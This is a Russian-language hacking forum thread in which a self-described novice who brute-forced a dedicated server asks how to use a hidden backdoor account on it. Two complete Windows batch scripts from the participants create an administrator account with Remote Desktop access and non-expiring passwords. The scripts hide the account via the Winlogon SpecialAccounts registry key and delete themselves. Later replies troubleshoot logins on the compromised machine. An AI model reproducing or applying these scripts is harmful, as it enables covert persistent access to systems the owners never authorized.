Скрытая учетка

BullStray · 14 Окт 2017

Привет, хотел задать вопрос. Сбрутил дедик ( я в этом новичёк), зашел под него. У меня уже был готов batник на создание скрытой учетки с settlogin, settpass и прочим.
Перекинул на дедик, запустил, всё прошло успешно. И что дальше? Как войти под эту учетку или под неё не надо входить и можно уже брутить с этого дедика? Знающие не кидайтесь помидорами, а просто помогите несмышлёному новичку. Спасибо!

Theseus · 14 Окт 2017

Заходишь вписывая свои новые данные - логин+пароль, затем ищешь свою учетку(папку) и скрываешь её. всё.
И не оставляй ничего на рабочем столе

BullStray · 14 Окт 2017

Theseus написал(а):
Заходишь вписывая свои новые данные - логин+пароль, затем ищешь свою учетку(папку) и скрываешь её. всё.
И не оставляй ничего на рабочем столе

Смотри, я батник запустил, всё ВРОДЕ как создалось, а под эту учетку я зайти не могу, мол "Недопустимые учетные данные", и саму папку найти с админа не могу, я понимаю что я похоже на столько туп и заблудился в 2 берёзах, но что мне делать то? :D

CYBER GHETTO · 14 Окт 2017

Когда со своего компуктера ты вводишь имя пользователя, то уже надо вводить не брученные, а созданные данные

Theseus · 14 Окт 2017

Батник такой?

BullStray · 14 Окт 2017

Theseus написал(а):
Батник такой?

Нет

BullStray · 14 Окт 2017

Theseus написал(а):
Батник такой?

@ echo off
set login=LOGIN
set pass=PASSWORD

net user %login% %pass% /add
net localgroup Administrators %login% /add
net localgroup "Remote Desktop Users" %login% /add
net accounts /maxpwage:unlimited
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %login% /t REG_DWORD /d "00000000" /f
attrib +H C:\Users /S /D
echo
Timeout /t 15
del %0
exit

Вот такой.

Theseus · 14 Окт 2017

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user login pass /add
net localgroup %AdmGroup% login /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" login /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v login /t REG_DWORD /d 0 /f
del %0

Theseus · 14 Окт 2017

Theseus написал(а):
Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user login pass /add
net localgroup %AdmGroup% login /add
Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" login /add
net accounts /maxpwage:unlimited
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v login /t REG_DWORD /d 0 /f
del %0

Попробуй этот. Login и pass замени на свои.

BullStray · 14 Окт 2017

Theseus написал(а):
Попробуй этот. Login и pass замени на свои.

net localgroup "%RDPGroup%" login /add
Сюда тоже логин писать?

Theseus · 14 Окт 2017

Да, везде(!) где я написал "login" удали это слово и вставь вместо него свое. Вписывай его при авторизации на деде

BullStray · 14 Окт 2017

Theseus написал(а):
Да, везде(!) где я написал "login" удали это слово и вставь вместо него свое. Вписывай его при авторизации на деде

Учётки нету, батник запустил, он завершился и удалился. Под учетку зайти не могу :(

Theseus · 14 Окт 2017

От имени администратора запустил?

BullStray · 14 Окт 2017

Theseus написал(а):
От имени администратора запустил?

Nope, сейчас попробую.

BullStray · 14 Окт 2017

Theseus написал(а):
От имени администратора запустил?

Ничего не изменилось.(

Theseus · 14 Окт 2017

Сюда ты вписываешь те новые "login"и "pass" что поменял в батнике? проверь, ты ТОЧНО все изменил?

BullStray · 14 Окт 2017

Theseus написал(а):
Сюда ты вписываешь те новые "login"и "pass" что поменял в батнике? проверь, ты ТОЧНО все изменил?

Да, но теперь дедик вообще на работает :D
Благодарю за помощь, видать моя тупость мешает мне всё это сделать нормально.

lolpw · 14 Окт 2017

Знаю две возможных причины, почему не заходило:
1. Если на дедик кто-то поставил криптор, то в папке юзерс мог зашифроваться файл отвечающий за учетки, за этого винда не смогла добавить новую учётку
2. Если учетка под которой вы заходили работает в домене (названиедомена/логин) и вы пытаетесь залогиниться под учёткой которой просто напросто нет в данном домене(не создана на сервере актив директори), а создалась именно на той винде внутренняя учётка
Тогда нужно логиниться не используя домен
.\логин

Скрытая учетка

BullStray

BullStray

Theseus

Theseus

BullStray

BullStray

CYBER GHETTO

Staffer

CYBER GHETTO

Staffer

Theseus

Theseus

BullStray

BullStray

BullStray

BullStray

Theseus

Theseus

Theseus

Theseus

BullStray

BullStray

Theseus

Theseus

BullStray

BullStray

Theseus

Theseus

BullStray

BullStray

BullStray

BullStray

Theseus

Theseus

BullStray

BullStray

lolpw

lolpw